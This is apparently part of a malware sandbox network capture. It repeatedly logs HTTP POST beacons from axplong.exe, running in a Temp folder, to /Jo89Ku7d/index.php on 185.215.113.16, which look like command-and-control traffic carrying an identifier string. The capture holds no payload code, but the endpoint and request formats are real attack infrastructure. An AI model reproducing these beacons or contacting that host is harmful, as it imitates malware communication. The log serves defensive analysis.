Sep 26, 2024 18:29:14.717986107 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49731	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:14.847330093 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:15.571053028 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:15.572169065 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:15.804568052 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49732	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:15.926969051 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:16.653939962 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:16.654900074 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:16.881238937 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49733	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:17.004812002 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:17.728404999 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:17.729402065 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:17.971012115 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49734	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:18.086746931 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:18.797792912 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:18.806365013 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:19.049438000 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49735	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:19.174683094 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:19.901345968 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:19.902298927 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:20.134442091 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49736	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:20.278815031 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:21.052167892 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:21.053067923 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:21.290230036 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49737	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:21.432295084 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:22.162587881 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:22.163767099 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:22.435724974 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49738	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:22.555008888 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:23.290199995 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:23.296442986 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:23.525418997 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49739	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:23.673394918 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:24.420269012 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:24.536663055 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:24.802232981 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49740	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:24.933429956 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:25.663999081 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:25.664874077 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:25.897031069 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49741	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:26.021989107 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:26.732294083 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:26.733172894 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:26.962781906 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49742	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:27.081470966 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:27.803015947 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:27.804039001 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:28.034357071 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49743	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:28.145132065 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:28.856002092 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
